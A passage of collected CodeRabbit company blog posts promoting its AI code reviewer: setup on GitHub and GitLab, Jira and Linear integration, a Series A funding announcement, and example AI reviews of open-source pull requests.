resolve the intended issues, in this case, updating the handling of `README.md` files in the programming exercise system. ![](https://framerusercontent.com/images/ClgZcp0w2ghA1nVMeBnUrP0n9I.png) You can also interact with CodeRabbit through chat to verify if a pull request fully addresses its linked issue, helping you make informed decisions about merging. ![](https://framerusercontent.com/images/3tvR9vW1rEmsaYI1LMvP28D5opI.png) Hope this guide has clarified how to integrate CodeRabbit with Linear and how CodeRabbit uses the issue context to validate pull requests. By using this integration, you can ensure if pull requests are effectively solving the problems they're meant to address. Integrate CodeRabbit and let it take care of your PR reviews and issue validation. [Start your free trial](https://app.coderabbit.ai/login) today!

How to integrate AI Code Review into your DevOps pipeline

Aravind Putrevu — Sun, 25 Aug 2024 00:00:00 GMT

GitHub is the central hub for countless Open-source projects. However, for repository maintainers, a steady flow of pull requests (PRs) can quickly turn into an [overwhelming workload](https://minimaxir.com/2023/11/open-source-dead-github/). Those managing popular OSS repositories with numerous stars are well aware of the challenges of keeping up with code reviews, maintaining quality, and keeping the project on track. A quick search on “has this been abandoned” on Github shows a lot on what’s happening across various successful repositories. ![](https://framerusercontent.com/images/0ehCtGtnWx4lSZORxdaHXWQF0Q.png) A healthy Maintainer <> Contributor equation has a lot of pieces but Pull-requests plays a substantial role, as it is the biggest point of contact with the repo maintainers after finding an issue one could work on. We at CodeRabbit, has lived through this problem and with the advent of Generative AI, code generation models, we realised we could help improve this end of developer’s life. [CodeRabbit](https://coderabbit.ai/) is an AI code reviewer designed to ease the challenges of code review, supporting repository maintainers and teams. It not only reviews your PRs but also provides concise summaries, identifies potential issues, and offers insights that might be missed during manual reviews. ## How CodeRabbit Works? Curious about how CodeRabbit works? Here's a breakdown of the process: CodeRabbit integrates with GitHub, automating the code review process from the moment a pull request is created. It preprocesses the PR content, builds context, leverages Large Language Models for analysis, and then post-processes the AI response before posting the review back to GitHub. This streamlined workflow ensures thorough AI-powered code reviews without manual intervention. ![](https://framerusercontent.com/images/uKEWrFEa2GbnjvC09Vwm2tMskB4.png) ## Integrating with GitHub ### 1\. Accessing CodeRabbit Navigate to the [Code Rabbit login](https://coderabbit.ai/) page. You'll be presented with various git options when you try to login. Choose the one, whether it's GitHub, GitLab, or Self hosted Github, or Gitlab ![](https://framerusercontent.com/images/1ytWwnELwfYl5nVtfsv9fcr7IQ.png) After selecting your Git platform, follow the specific configuration guide: 1. GitHub: Standard login (steps provided below) 2. GitLab: Follow standard login and authorization from below steps. For organization-wide use, consider creating a dedicated GitLab user with a [Personal Access Token](https://docs.coderabbit.ai/platforms/saas-gitlab). 3. Self-Hosted GitHub: [Setup instructions](https://docs.coderabbit.ai/platforms/self-hosted-github) 4. Self-Hosted GitLab: [Setup instructions](https://docs.coderabbit.ai/platforms/self-hosted-gitlab) ### 2\. Authorization In you had chosen Login with GitHub& GitLab in step1 , you'll be prompted to authorize CodeRabbit. This step grants the necessary permissions for CodeRabbit to interact with your repositories and pull requests. ![](https://framerusercontent.com/images/nzbULb8XfAN3on8yqTEQeT5PEzI.png) ### 3\. Selecting Your Organization Upon Authorization, If you're part of multiple organizations, you'll have the opportunity to choose which one you want to associate with CodeRabbit. This ensures that you're setting up the tool for the correct team or project. ![](https://framerusercontent.com/images/N2VObQnTCwyi7UMHwBsMvgbr0e8.png) ### 4\. Exploring the CodeRabbit Dashboard Upon successful authorization, you'll be logged into the CodeRabbit user interface. Here, you can add repositories and configure CodeRabbit config settings for each repository. Here’s how the UI looks... ![](https://framerusercontent.com/images/lw0O1J8R5dpL0AKWurfAAJ110.png) 💡 If you opt to authorize all repositories during setup, CodeRabbit will automatically include any new repositories you create on GitHub in the future. This saves you the hassle of manual additions down the line. 5. CodeRabbit Configuration With your repositories added, it's time to configure CodeRabbit to your needs. You have three options for configuration: ### 5\. CodeRabbit Configuration You can configure CodeRabbit through a YAML file or using the [App’s UI](http://app.coderabbit.ai/). You can tailor CodeRabbit's functionality using the coderabbit.yaml file, which you place directly in your GitHub repository. This file mirrors the options available in the CodeRabbit user interface, with each setting in the YAML corresponding to a specific toggle in the UI. Configure CodeRabbit either through the coderabbit.yaml file or the interface, depending on your preference. 💡 If a `coderabbit.yaml` file exists in your GitHub repository, it takes precedence over any UI settings. Choose either the YAML file or UI configuration - you don't need to use both. Refer `Coderabbit.yaml` schema [here](https://storage.googleapis.com/coderabbit_public_assets/schema.v2.json?_gl=1*ch6chg*_gcl_aw*R0NMLjE3MjQwNzIxNjMuQ2owS0NRancyb3UyQmhDQ0FSSXNBTkF3TTJISHdjQmlZQk16dFVkSGZLZFlReVEzdTlGSm1XNDYwN2VKQk56QkpXYkZRSTV1SWVOM19CWWFBbDYzRUFMd193Y0I.*_gcl_au*MTEyNTE3ODMxOC4xNzE4OTE2Mjk1) Once your coderabbit.yaml file is prepared according to your needs, simply place it in your GitHub repository, and you’re all set—CodeRabbit is now integrated! When a pull request is created targeting the master branch, CodeRabbit automatically initiates its review process. It analyzes the changes and generates a summary and walkthrough of the modifications. The specific feedback and analysis provided by CodeRabbit are determined by the options you've configured in your YAML file. Let's examine a few examples of CodeRabbit's review comments from a specific pull request in one of the projects. This particular PR involved in changing the language model from LLaMA 2 to LLaMA 3, for testing purposes. These examples will showcase how CodeRabbit analyzed and commented on this significant model switch. ## Sample PR Review Workflow using CodeRabbit For every PR reviewed, CodeRabbit provides a summary of changes to start with, like the below image. ![](https://framerusercontent.com/images/W5pT98lxSt0FkgiOTGJGwffYJU.png) This image shows CodeRabbit's review status for another pull request. It highlights that 12 actionable comments were generated, and the review also includes additional comments on specific files, demonstrating CodeRabbit's comprehensive analysis of the code changes. ![](https://framerusercontent.com/images/ELCA1tXozaqouACK7O5gmupX8M.png) You can also use [CodeRabbit commands](https://docs.coderabbit.ai/guides/commands) to chat with the AI code Reviewer. ![](https://framerusercontent.com/images/WETVItDWHiveH27B5zMpbGeVXg.png) CodeRabbit could generate a Code sequence diagram when you request a full review. The sequence diagram illustrates the precise flow of interactions between the objects in the system. ![](https://framerusercontent.com/images/4OsUVqlm5wAKXcYjU7uoIHvfw.png) Also check out the response when i asked for what improvements can be done on the code level ![](https://framerusercontent.com/images/cU2uOXf789BZX16lsNkDPfLXkA4.png) In addition to providing reviews and summaries, CodeRabbit can also detect configuration issues. For example, I accidentally set up both CodeRabbit Pro (The process we've been discussing) and the open-source version (Refer to [different config process](https://github.com/coderabbitai/ai-pr-reviewer?tab=readme-ov-file#install-instructions)) in my repository at the same time. Interestingly, CodeRabbit noticed this mistake on its own and alerted me. You can see below how it pointed out this issue to me. ![](https://framerusercontent.com/images/D9jXYWaO630Igu5sCAxD5jHjg.png) Check out for some of the stats and test plans generated by this AI code reviewer for another different project’s pull request. ![](https://framerusercontent.com/images/b6G6wz1xcrseIFuZOE7Q0SVrHw.png) ![](https://framerusercontent.com/images/0hC400ltZ5c9ML3abQw4kEQE3E.png) CodeRabbit also allows you to configure custom review instructions based on your organization's needs, in case you want it to follow specific guidelines beyond the standard review, to learn more on [adding custom review instructions](https://docs.coderabbit.ai/guides/review-instructions/) Whether you manage a popular repository or are working on a smaller project, whether it's hosted on GitLab, GitHub, or self-hosted GitHub or GitLab, CodeRabbit can help streamline your development process. This AI Code Review assistant is designed to save you time by automating code reviews and offering insightful feedback. Explore! Experiment! Discover how [CodeRabbit](https://docs.coderabbit.ai/) can streamline your code review process using AI!!!

CodeRabbit Announces $16M Series-A Funding Led by CRV

Aravind Putrevu — Tue, 13 Aug 2024 00:00:00 GMT

Exciting news! CodeRabbit has secured a [$16 million Series A funding round](https://www.crv.com/companies/coderabbit), with [CRV](https://www.crv.com/) leading the charge. This funding will help us accelerate our mission to transform code quality, security and developer productivity with AI. [Reid Christian](https://www.crv.com/team/reid-christian), General Partner at CRV, will be joining our board, and we're thrilled to leverage CRV's expertise and network to serve our customers better. For us, finding the right early-stage VC firm was all about increasing our productivity and accelerating our growth. Selecting CRV as our partner was easy given the firm's commitment to the developer community and its track record for working alongside founders, not just in the startup phase, but through IPO and beyond. This round includes investments from [Tod Sacerdoti (Flex Capital)](https://www.flexcapital.com/), [Ashmeet Sidana (Engineering Capital)](https://www.engineeringcapital.com/) and several mentors, who bring a wealth of experience in developer tools and enterprise AI. ## Our Journey So Far We are witnessing an inflection point in the software development industry. Developers around the world have been realizing the incredible possibilities that AI can bring. The introduction of GitHub Copilot and ChatGPT have revolutionized software development and have been the fastest-growing tools in this space. While on the code generation side, many tools have emerged, the code review process has remained largely unchanged. We continue to use the same tools and processes that were used 10 years ago. The code is still manually reviewed, which is slow, error-prone, and expensive. CodeRabbit was born out of this realization. As developers ourselves, we faced the inefficiencies and frustrations of traditional code reviews at our previous workplaces. We envisioned an AI-powered code reviewer that could save developers countless hours while improving the quality of the code that goes beyond what is possible with human reviewers alone and existing linting tools. Since its inception, CodeRabbit has been well-received by the developer community. The company reached $1M+ in annual recurring revenue milestone in less than a year, while operating on a bootstrapped budget. Some high-level traction stats: * Most installed AI application on GitHub Marketplace: 16K+ installations * 150K+ repositories under review * Several hundred paying organizations * High adoption in open-source projects: 300K+ pull requests reviewed * On average, 10K+ developers use CodeRabbit daily * Strong community: 15K+ followers on X and 2K+ users on our Discord server ## What Worked for Us * **Intuitive product experience**: Investing in sheer delight and attention to detail helped build a loyal user base. This is especially true in the AI-applications space, where user experience can make or break a product. Most AI products tend to be spammy and noisy, leading to user abandonment. Right from the get-go, we strived to maintain a high signal-to-noise ratio in our product and provide feedback that is actionable and easy to accept without cognitive overload. * **Engineered for product-led growth:** Early on, we realized that the best way to bring our product to a wider audience was to make it easy for developers to discover and use it. We invested heavily in the seamless onboarding experience, easy organization-wide rollouts, integration with popular platforms like GitHub & GitLab, easy to understand pricing, and a generous free tier. This helped us grow our user base rapidly and organically. * **Getting love with the open-source community**: We made our paid product free for public repositories, which helped us gain a strong foothold in the open-source community. This not only helped us build a strong brand presence but also allowed us to get valuable feedback from the community, which we used to improve our product. We strongly believe in giving back to the community and have been an active sponsor of several open-source projects that we use in our stack. ## What Lies Ahead CodeRabbit is a fast-growing company, and we are excited about the future of bringing AI to developer workflows. The new venture funding will help us hire top talent across engineering, product and GTM functions to help us expand our product offerings and accelerate our growth. Ready to join us? Explore open positions on our [careers page](https://coderabbit.ai/careers) or email us at [careers@coderabbit.ai](mailto:careers@coderabbit.ai). Not looking for a new role but want to supercharge your code reviews with AI-driven contextual feedback? Try CodeRabbit with a [free 14-day trial](https://coderabbit.ai/)!

Optimize Issue Management with CodeRabbit

Aravind Putrevu — Wed, 05 Jun 2024 00:00:00 GMT

If you’ve ever felt swamped managing software issues, you know how it can drag down your whole day. It’s frustrating to get bogged down with tracking bugs and juggling tasks when you really just want to write code. That’s exactly why you'll appreciate using an AI code reviewer like CodeRabbit. It's like having a smart assistant by your side, streamlining all those tedious issue management chores. Imagine spending less time on admin tasks and more on creative code development. CodeRabbit can transform your workflow, making your projects run smoother and your days a bit easier. If your project is using Jira or Linear, you can easily integrate it into your daily processes, optimizing issue management without a sweat. ## The role of issue management tools Software development requires three primary skills: coding, issue management, and communication. Specialized tools like Jira and Linear serve as the backbone for teams looking to streamline work and enhance productivity. They organize, track, and manage the progression of individual problems and tasks within a project. ![](https://framerusercontent.com/images/NNDfCcKeZjDHSnd7FASBOOddvM.png) ### Jira and Linear for issue tracking Jira and Linear are two of the most popular platforms for issue tracking. Jira, known for its versatility, is favored by teams for agile project management, bug tracking, and focused communication. It’s like the Swiss Army knife of project management tools. ![](https://framerusercontent.com/images/hlSjzO9aiA5MmiZRX5WEf7ycJc.png) Jira stands out due to its customizable workflows, which allow teams to tailor the tool to their specific project needs and management styles. Additionally, Jira’s extensive integration capabilities with various development tools enhance its functionality, making it an indispensable asset for comprehensive project oversight. Linear is more streamlined. Its sleek, intuitive interface makes issue tracking seem less daunting and more integrated into the daily workflow. Linear is designed to reduce clutter and speed up issue resolution, making it a favorite for teams that prioritize efficiency and user experience. It features a command palette tool that allows quick navigation and task management without needing to navigate through menus. It also automates prioritization of issues based on set criteria, a feature that significantly enhances productivity. ## Integrating CodeRabbit with issue management tools Integrating CodeRabbit with an issue management tool is easy and takes just a few seconds. Here’s a closer look at how this integration works and why it could be a game-changer for your project management. ### How CodeRabbit integrates with Jira and Linear CodeRabbit acts as a bridge that connects your coding efforts with your project management tools. Once connected, CodeRabbit automatically syncs issues, pulling relevant tasks and linking them directly to your coding environment. It can update tickets, track progress, and manage issues so you can stay focused on writing code. CodeRabbit automatically links every commit and pull request back to specific issues or tickets. Teams get full traceability and accountability, helping them see exactly who did what, and why. It can also scan code changes to link backlogged issues that can be resolved, reducing the amount of technical debt carried by the project. Teams can prioritize work based on real-time data, allowing them to tackle the most critical issues first. In the end, they’re fixing bugs faster and making strategic decisions that align with project goals and deadlines to achieve a smoother, more efficient project lifecycle. ### Specific features of CodeRabbit that enhance issue management CodeRabbit is engineered to optimize the software development lifecycle. Here's how CodeRabbit specifically enhances issue management with its array of specialized features: * **AI-Driven insights:** Predicts potential bugs and suggests preemptive fixes based on best coding practices, reducing the likelihood of future issues * **Integrated dashboard:** Provides a comprehensive overview of all ongoing issues, their current status, and assigned team members, increasing project transparency and coordination * **Automated task handling:** Streamlines routine tasks such as issue labeling and routing, which minimizes manual labor and allows developers to concentrate on more complex challenges ## Validating pull requests with Jira and Linear Software development necessarily involves meticulous tracking that every pull request meets coding standards and effectively addresses the underlying issues they're meant to resolve. CodeRabbit does all the heavy lifting for you. ### Validating pull requests effectively By integrating with version control systems like GitHub or GitLab, every pull request can be linked directly to an issue or ticket. CodeRabbit also automatically checks if the changes align with the requirements specified in the ticket. This ensures that nothing is overlooked and that all aspects of the issue have been addressed before the code is merged. ### Example workflow: Integration of CodeRabbit with Jira and Linear to validate changes Let’s say a development team is working on enhancing their web application's form handling capabilities. A developer submits a pull request that includes several updates to the UrlEncodeMarshal struct in their application code. Here's how CodeRabbit, helps to automate and validate these changes: 1. **Assessment of pull request changes:** In the example below, the focus is on checking each update in the UrlEncodeMarshal struct against the GitHub issue requirements. While additions like the NewDecoder method and FormUrlEncoded in the marshalerRegistry map align well, methods like ContentType and Marshal contradict the specified need for URL-encoded form handling. ![](https://framerusercontent.com/images/9G1LTBLFHNlP2HnPOMWELza3U.png) a. Addition of UrlEncodeMarshal struct: CodeRabbit verifies that the new struct supports URL encoding, aligning perfectly with the GitHub issue's requirement to enhance form handling for URL-encoded forms. b. ContentType method in UrlEncodeMarshal struct: The pull request suggests this method returns application/json, which contradicts the requirement for URL-encoded form handling. CodeRabbit flags this as a mismatch c. Marshal method in UrlEncodeMarshal struct: This method is found to marshal the response in JSON format, which conflicts with the requirement for URL-encoded forms. This issue is also flagged by CodeRabbit d. NewDecoder method in UrlEncodeMarshal struct: Successfully reads the request body, parses it as form data, and populates the query parameters as required, which is a positive alignment with the issue requirements e. Addition of FormUrlEncoded and DefaultFormMarshaler in marshalerRegistry map: Supports the MIME type for URL-encoded forms, aligning well with the GitHub issue's objectives 2. **Automated feedback loop:** Once the pull request is analyzed, CodeRabbit automatically updates the linked Jira and Linear tickets with detailed feedback on each component of the pull request. This includes both the validated elements and those that require revisions, ensuring that all aspects of the issue are addressed before merging. 3. **Seamless developer interaction:** Developers receive real-time chatbot feedback directly in their coding environment, enabling quick revisions and re-submission of updated code for further validation. This tight integration cuts down on the review cycle time and enhances overall code quality. By automating the validation of pull requests against specific GitHub or GitLab issues, CodeRabbit makes sure every code change is relevant and correctly implemented. A significant side benefit is that it speeds up the development process. Integrating with Jira and Linear will extend this feature to wider issue management processes, improving project efficiency and the quality of outputs. ## Best Practices for Optimizing Issue Management Getting the most out of your issue management tools means optimizing them to work seamlessly with CodeRabbit. Here’s how you can set up these tools for peak performance and ensure your issue management process runs like a well-oiled machine. * **Direct linking:** Begin by linking CodeRabbit directly to your existing projects in Jira and Linear. This integration enables real-time syncing of issues and tasks within your development environment, ensuring that updates and changes are immediately reflected * **Training and navigation**: Keep your team well-versed in how to navigate between CodeRabbit, Jira, and Linear. Familiarity with these tools reduces friction and enhances productivity. Update your README file with clear instructions on how to work with CodeRabbit. * **Documentation and tracking guidelines:** Establish clear guidelines on how issues should be documented and tracked in Jira or Linear. Clarify how CodeRabbit complements these processes, ensuring that all team members use these tools effectively The key is to make sure every team member can use these tools to their full potential. The goal is to make your workflow as smooth as possible, transforming issue management into a proactive component of your development strategy. ### Streamlining your issue management process Managing issues effectively in software development involves a streamlined process that prevents bottlenecks and maximizes team output. Here’s how to fine-tune your process: 1. **Prioritizing critical issues:** Leverage CodeRabbit's AI insights to figure out which issues are the most pressing based on their impact and complexity. Prioritizing your issues speeds up resolution times and really ramps up your team's productivity 2. **Automation of checks and balances:** Use CodeRabbit's analysis features to automate routine checks and suggest preemptive fixes. Reduce the chances of small issues blowing up to keep everything running smoothly and make your software more reliable 3. **Seamless integration customization:** Set up Jira and Linear to automatically update task statuses. The process is automated and does not require manual intervention once set up. Taking a proactive approach saves time and boosts the overall quality of your projects, making sure that your team can focus on what they do best: innovating and solving complex problems. ## CodeRabbit makes issue management easier Using CodeRabbit can significantly streamline your issue management, making it quicker and more efficient to identify, track, and resolve software bugs. This enhanced management capability ensures that your development team can focus more on critical development tasks rather than getting bogged down by repetitive issue tracking. Experience the difference in your project workflow with CodeRabbit. Discover how our platform can bolster your issue management strategies and support your team in delivering higher-quality software more efficiently. Start your journey with CodeRabbit today—[Sign Up for a Free Trial](https://coderabbit.ai/)!

How AI is Transforming Traditional Code Review Practices

Aravind Putrevu — Tue, 28 May 2024 00:00:00 GMT

Code reviews are critical checkpoints when developing software. Traditionally, they’ve been done by human developers, who pore over lines of code, hunting for defects and bugs. The process ensures adherence to coding standards, promotes best practices, and levels up domain knowledge across teams. However, it’s not quick or flawless. According to [SmartBear's study of a Cisco Systems programming team](https://smartbear.com/resources/case-studies/cisco-systems-collaborator), a review of 200-400 lines of code should take about 60 to 90 minutes to achieve a 70-90% defect discovery rate. Still, it’s an incredibly valuable part of the process. Software developers almost universally consider code reviews to be important, according to a [2022 Global DevSecOps Survey](https://about.gitlab.com/developer-survey). ## Current state: Code reviews in practice[](https://blog.coderabbit.ai/blog/ai-transforming-traditional-code-review-practices#current-state-code-reviews-in-practice) Code reviews have been a staple of software development since the 1970s. Although the tools and languages have changed, the goal hasn’t. When a software developer makes a code change, they want other pairs of eyes on it to make sure the change has the effect that they want without any unintentional side effects. In this manner, code reviews help mitigate risk of breaking changes. It is also a cultural practice that trains new engineers and builds team cohesion. They’re also one of the only practices left that are entirely manual. Engineers must actually take the time and energy to look at the changes being made and analyze them from different perspectives. They can’t afford to take risks on security, standards compliance, or reliability issues, so it’s resource intensive and requires skills developed over time with practice. ## Code review conundrums[](https://blog.coderabbit.ai/blog/ai-transforming-traditional-code-review-practices#code-review-conundrums) Even after years of practice, code reviews are difficult, slow, and inefficient. Roughly [45% of developers](https://blog.codacy.com/10-facts-about-code-reviews-and-quality) cite 'Lack of Time' as the primary obstacle to reviewing code, while 34% attribute it to the 'Pressure to Ship'. Everyone involved in software development, from the CEO to the project manager, has to put faith in the process in hopes that code changes don’t introduce any new problems. This is why they're time-consuming, prone to lack of oversight, and can sometimes turn into a subjective critique session rather than a constructive feedback loop. Here are a few pain points: * **Time Constraints:** Developers are often pressed for time, juggling multiple tasks and deadlines. Comprehensive code reviews either compete with this valuable time and cause delayed timelines, or code review quality may suffer as shortcuts are taken in order to complete the work. * **Cognitive Bias and Variability:** No two developers think alike. This subjectivity can lead to inconsistent reviews, where the focus and thoroughness vary wildly based on the reviewer's preferences, expertise, and mental state. * **Error Prone:** Subtle bugs and dependency issues can be missed, especially in complex or large codebases. This can lead to vulnerabilities, and technical debt released into the wild. * **Knowledge Silos:** Technical knowledge tends to get siloed, especially in large teams. This silo effect can prevent a thorough understanding of the codebase, reducing the effectiveness of code reviews. Where there are humans doing work, there are imperfections and risks of blind spots. To make matters worse, developers that spend [more than a day a week](https://blog.codacy.com/10-facts-about-code-reviews-and-quality#) reviewing code don’t have any correlation to improvements in perceived code quality. There is also no correlation in terms of more time shipping new features (as opposed to fixing bugs or paying back tech debt). ## The AI revolution in software development[](https://blog.coderabbit.ai/blog/ai-transforming-traditional-code-review-practices#the-ai-revolution-in-software-development) Several AI-powered tools and platforms are making waves in the software development world, such as GitHub Copilot, CodeGuru by Amazon, and DeepCode by Snyk. These tools leverage machine learning and advanced algorithms to automate processes, suggest optimizations, and even generate code snippets to address identified issues. Their adoption underscores the potential and demand for AI in enhancing code review processes. Having these tools at the fingertips of developers helps produce more resilient and sophisticated code at the point of authorship. With AI, developers can theoretically eliminate most (if not all) of the pain points they experience. AI is fast, readily available, and AI doesn’t have to deal with organizational politics. ## Using AI to support code reviews[](https://blog.coderabbit.ai/blog/ai-transforming-traditional-code-review-practices#using-ai-to-support-code-reviews) The most effective use of AI in software development marries its strengths with the irreplaceable intuition, creativity, and experience of human developers. This synergistic approach leverages AI for what it does best—speed, consistency, and automation—while relying on humans for strategic decision-making and nuanced understanding that AI (currently) cannot replicate. AI can now be used to address the challenges of traditionally human-centric process of code reviews. For example, AI can scan entire code repositories and workflow systems to understand the context in which the codebase runs. This is a major advantage for today’s modern AI code review systems, and one that pre-genAI tools lacked. Here are a few other ways AI can help: * **Automating Tedious Tasks:** Code reviews often involve repetitive tasks, such as checking coding standards, documentation, and boilerplate code compliance. AI can automate these aspects of code reviews, freeing up human reviewers to focus on more complex and subjective aspects of the code that require human judgment and experience. This not only speeds up the review process but also reduces the cognitive load on human reviewers. * **Identify Defects Faster:** AI can tirelessly scan through thousands of lines of code in minutes, identifying logical flaws and even complex security vulnerabilities with precision that rivals or surpasses the human eye. This allows human reviewers to focus on higher-level architectural and design considerations instead of getting bogged down in finding needle-in-the-haystack type errors. * **Consistent and Objective:** AI doesn't have a bad day or get mad at a management decision (yet). It doesn't have biases towards certain coding styles or practices unless they're part of its training data. By applying uniform standards across the board, AI ensures that every line of code is reviewed with the same level of scrutiny, bringing a level of consistency that is hard to achieve in human-only reviews. * **Instantaneous Feedback:** One of the most significant advantages of AI in code reviews is the ability to analyze and provide feedback in real-time to developers. This immediacy helps identify issues within the context of discussion of the code review - rather than in later development cycle stages, thus reducing the cost and effort of fixing bugs down the line. * **Learning and Adaptation:** Advanced AI systems can learn from past reviews, developer corrections, and evolving coding practices. This learning capability means that AI assistants can continuously improve, offering more relevant and accurate feedback over time. * **Knowledge Sharing and Augmentation:** By integrating insights from across the codebase and external sources, AI can act as a knowledge-sharing platform, suggesting best practices, offering coding tips, and even providing examples from similar projects. This feature helps break down knowledge silos and fosters a culture of continuous learning and improvement. ## AI code reviews are transformative, not incremental[](https://blog.coderabbit.ai/blog/ai-transforming-traditional-code-review-practices#ai-code-reviews-are-transformative-not-incremental) The integration of AI technology into the code review process is not just an incremental improvement, but a transformative change. Current AI technology can play the role of an assistant to a software development team, accelerating and offloading tedious manual analysis and bug finding. Future advancements will see AI evolve into the role of a collaborator, capable of more complex reasoning, offering design suggestions, best practices, and even predicting or simulating the impact of code changes on software functionality and performance. AI can provide deeper insights into code quality, offer personalized feedback, and play a key role in installing a culture of learning and improvement within development teams. The journey towards fully realizing the potential of AI in code reviews requires mindful integration and a continued partnership between human developers and their AI counterparts. The future of software development is bright, and AI is undoubtedly a leading light on this horizon. CodeRabbit is the best AI code review tool for GitHub and GitLab. Sign up and get a free trial for your team or organization.

How to Use an AI Code Reviewer on GitHub in 4 Examples

Aravind Putrevu — Mon, 27 May 2024 00:00:00 GMT

Nobody prepares you for the hard work of being an OSS project maintainer. When you’re just getting started, it’s exciting to get the word out and generate hype around your project. You start earning followers and stars on your repo, people are using your software, and momentum begins to build. But over time, things can get unwieldy. More and more people are using your code, which is great, but expectations increase. You have to start thinking differently about your work. There’s mounting pressure for new features, better performance, bug fixes, and (most importantly) security. What started as a hobby can quickly become a substantial responsibility. Maintainers of popular projects are turning to AI for help, particularly for code reviews. An AI can quickly scan through pull requests for errors and security flaws, providing some breathing room to project maintainers. It’s especially helpful for contributor PRs, acting as a proactive line of defense for maintainers’ time. Let’s review some of the most effective use cases we see emerging on some notable repos. ## High-level PR summaries and expert code walkthroughs in an instant The more popular the OSS project, the more difficult it is to track what’s actually happening with code contributions. Maintainers often need a brief summary of what’s going on with a new PR and the code changes it introduces. Let’s look at a [PR summary](https://github.com/vitwit/resolute/pull/1114#issue-2085463729) for [Vitwit](https://www.vitwit.com/), an AI and blockchain company based in Hyderabad, India. The purpose of the PR is to close a feature request for new wallet switching functionality in January 2024. As you read through the following, think about how much time and energy are saved for the maintainer: fewer clicks, lower cognitive load, and expert commentary that considers the context of the entire codebase. ![](https://framerusercontent.com/images/4XOf98OxfgY2HrcW4ymZPQr8II.png) At a brief glance, you can see the PR contains two code commits with changes across six files. Instead of clicking through the six files and reviewing code changes, there’s a quick summary of the new features and enhancements being introduced. Further down, we can see an automated comment with a technical walkthrough of the changes. The AI explains the feature’s purpose, the required data integration, and compatibility concerns — all in plain English in a short, easy-to-read paragraph. File-level changes are summarized in a short table followed by another table that demonstrates whether the code changes actually address existing software requirements. The maintainer doesn’t need to manually review whether the feature requirements are actually addressed. Everything is spelled out in a way that can be visually skimmed for completeness. ![](https://framerusercontent.com/images/RVWRlvIkLbIuVpp5AtnfhczlpcU.png) **To compile and check for all this information would take an expert maintainer at least half an hour.** With an AI, they get it in an instant. It’s contextually aware and contains the code, the PR, all open issues, stylistic expectations, and whether there’s sufficient documentation. The maintainer can focus on the risk of merging the change and home in on where improvements can be made. ## Collaborative, interactive PR code reviews and issue tracking in real time Developer [Kevin Mesiab](https://github.com/kmesiab) built an interactive, SMS-based nudging feature in his [Equilibria engine](https://github.com/kmesiab/equilibria). For [this pull request](https://github.com/kmesiab/equilibria/pull/1), he went beyond the PR summary and code walkthrough for some interactive insights and assistance. The AI made a recommendation to add logging for database connectivity in the `PingDatabase` function. ![](https://framerusercontent.com/images/xoJmzbEzN8UaKyp1cNHfGOsRL5E.png) You can see the suggested change in the “Committable suggestion” section below. ![](https://framerusercontent.com/images/XCS7e37YyuNLnSSACePbZBIM.png) Mesiab responds in a chat by saying logging is already handled in a different way outside of the function. The AI accepts the feedback and retains the knowledge for the future. (Imagine if every dev took feedback so kindly!) Next, the AI discovers some potential issues in the existing GET-based implementation. It offers thorough feedback and a suggested alternative. Mesiab tells the AI to file the suggestion as an issue, which it does, and then provides the link. Given that many developers are strapped for time, it’s unlikely that they’d provide such thorough analysis to the point of providing alternative implementation code. And if they did, it would take much, much longer than the instantaneous response of the AI. **Not only is Mesiab saving his own time, but he’s getting much more bang for the buck out of his code-reviewing peer.** Development time isn’t cheap, so this brief interaction saves time and money. ## Open-minded, long-term learning [Artemis](https://github.com/ls1intum/Artemis) is a popular interactive learning app with individualized feedback for learning reinforcement. Written and supported by the [Technical University of Munich](https://github.com/ls1intum), Artemis has many contributors, meaning a larger codebase with more moving parts. In [this chat-based interaction](https://github.com/ls1intum/Artemis/pull/8037), we can see a suggestion from the AI overruled by the maintainer: “we want to get rid of the star imports.” The AI’s response: “Understood, I’ll remember this preference for explicit imports over wildcard imports in the Artemis project for future reviews.” ![](https://framerusercontent.com/images/zntirA1uLVoGqhehu4OnIOXco.png) Then the AI shares what it’s learned and what it will update about its previous learnings: ![](https://framerusercontent.com/images/CLJjLnBcxqYOCffpofoBG7CdIXc.png) Not only can you see what the AI has learned to do (and not do) in the future, but you can clearly see that learnings can be tracked to individual PRs. Those learnings can be corrected with a simple chat-based suggestion. For example, you can say, “Please don’t use explicit imports anymore. We are switching back to wildcard imports.” ## Easily maintain project standards and requirements [OpenReplay](https://github.com/openreplay/openreplay) is a self-hosted browser session replay and analytics tool that helps devs reproduce issues with real-world customer interaction data. It’s a popular repo with more than 8,800 stars. In [this pull request](https://github.com/openreplay/openreplay/pull/1858#discussion_r1467629285), there are new features, a few areas of refactoring, and the removal of outdated code, summarized by the AI ![](https://framerusercontent.com/images/f6nXaSyrcoyFreToOgCliIx34.png) In particular, we want to highlight the “codebase verification” feature that happens near the end of the PR. ![](https://framerusercontent.com/images/irb1pl1ufsGoeSDIj9X934GKhuE.png) The AI detects a reference to an old method (GetHandler) and finds that “not all references to the method were updated following its renaming to `bGetHandler` in the `Router` struct.” Perhaps this updated function name was a typo that needed correction, or perhaps it was an intentional renaming that wasn’t consistently applied. In either case, this could have been a breaking change introduced into the codebase that was caught by the AI. ## Impact of AI on OSS project maintenance With an AI code reviewer, maintainers have more help than ever in keeping a clean, consistent, and functional codebase. Looking through the examples above, we can clearly see how an AI can assist developers and maintainers with summaries, walkthroughs, interactive code reviews, and consistency. We can also see how much work can be done before a PR ever gets to a maintainer. AI code reviewers can make a huge difference for open source projects by: * Identifying errors * Enforcing coding standards * Spotting security risks * Explaining code changes * Telling maintainers where to focus When it comes down to it, we’re talking about time management and expertise. As OSS projects expand, there’s more to manage in terms of contributions and complexity. Plus, with AI handling routine and repetitive tasks, project maintainers can allocate human resources to more strategic tasks such as feature development, bug fixes, and community engagement. It’s an effective strategy for any project aiming for more efficient use of volunteer time and potentially faster project development. ## How to use an AI code reviewer in your OSS projects There are a variety of AI code reviewers available [in the GitHub Marketplace](https://github.com/marketplace?category=&type=&verification=&query=ai), many of which are completely free to use. To implement one in your open source project, follow these steps: 1. **Explore options:** Look for tools on the GitHub Marketplace that best meet the specific needs of your project, such as language support, customization options, and integration capabilities. 2. **Install and configure:** Select an AI tool and install it to your repository (some require only a couple of clicks). Configure the tool according to your project’s coding standards and review processes. This may include setting up rules for code style, defining error checks, and specifying security protocols. 3. **Integrate into workflow:** This might be the most difficult process if you’ve got a steady workflow going in your project. Consider automatically reviewing all new pull requests or configuring it to provide periodic codebase scans. Ensure that all contributors understand how to interact with the AI and what to expect from its reviews. (Update your README.) 4. **Monitor and tweak:** As you begin to use the AI tool, monitor its performance and feedback for effectiveness and 